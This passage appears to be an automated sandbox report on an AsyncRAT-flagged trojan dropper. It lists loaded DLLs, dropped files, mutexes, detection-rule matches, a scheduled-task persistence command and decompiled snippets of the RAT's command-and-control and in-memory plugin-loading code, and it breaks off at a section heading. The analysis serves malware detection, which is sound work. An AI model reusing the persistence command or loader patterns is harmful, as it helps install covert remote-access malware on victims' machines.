                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.0.X.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\X.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, Program.csCryptographic APIs: 'TransformFinalBlock'
                      Source: X.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: X.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: X.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Svchost.exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Svchost.exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: X.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: X.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Svchost.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Svchost.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@15/12@9/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile created: C:\Users\user\AppData\Roaming\X.exeJump to behavior
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3280
                      Source: C:\Users\user\AppData\Roaming\X.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeMutant created: \Sessions\1\BaseNamedObjects\YXNfkfdcxvmu2fH4q
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2580:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\X.exeMutant created: \Sessions\1\BaseNamedObjects\o8IEVsVtNAApv1Ch
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeVirustotal: Detection: 72%
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeReversingLabs: Detection: 87%
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\X.exe "C:\Users\user\AppData\Roaming\X.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe"
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\X.exe "C:\Users\user\AppData\Roaming\X.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeProcess created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exe "C:\Users\user\AppData\Roaming\61c7cdb3196df.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 3280 -ip 3280Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3280 -s 1732Jump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: Svchost.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\Svchost.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic file information: File size 2324480 > 1048576
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1dc800
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.pdbMZ@ source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Xml.pdbu source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: lib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.pdb#( source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: .pdb. source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\X.PDB7 source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: X.exe, 00000002.00000002.2842784193.000000001BB9D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbexe= source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BB9D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: X.exe, 00000002.00000002.2842784193.000000001BB3C000.00000004.00000020.00020000.00000000.sdmp, WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Management.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbion= source: X.exe, 00000002.00000002.2842784193.000000001BAC0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843678680.000000001C500000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.pdb` source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.pdbH source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: indoC:\Windows\mscorlib.pdb source: X.exe, 00000002.00000002.2843981122.000000001C7F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: System.ni.pdb source: WER1D84.tmp.dmp.18.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER1D84.tmp.dmp.18.dr

                      Data Obfuscation

                      barindex
                      Source: X.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: X.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: X.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: X.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: X.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: X.exe.0.dr, Messages.cs.Net Code: Memory
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2cf1658.1.raw.unpack, Messages.cs.Net Code: Memory
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe.2ce8618.2.raw.unpack, Messages.cs.Net Code: Memory
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: Svchost.exe.2.dr, Messages.cs.Net Code: Memory
                      Source: 61c7cdb3196df.exe.0.drStatic PE information: section name: .didata
                      Source: SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeStatic PE information: section name: .text entropy: 7.7009507911079

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile created: C:\Users\user\AppData\Roaming\61c7cdb3196df.exeJump to dropped file
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exeFile created: C:\Users\user\AppData\Roaming\X.exeJump to dropped file

                      Boot Survival

                      barindex
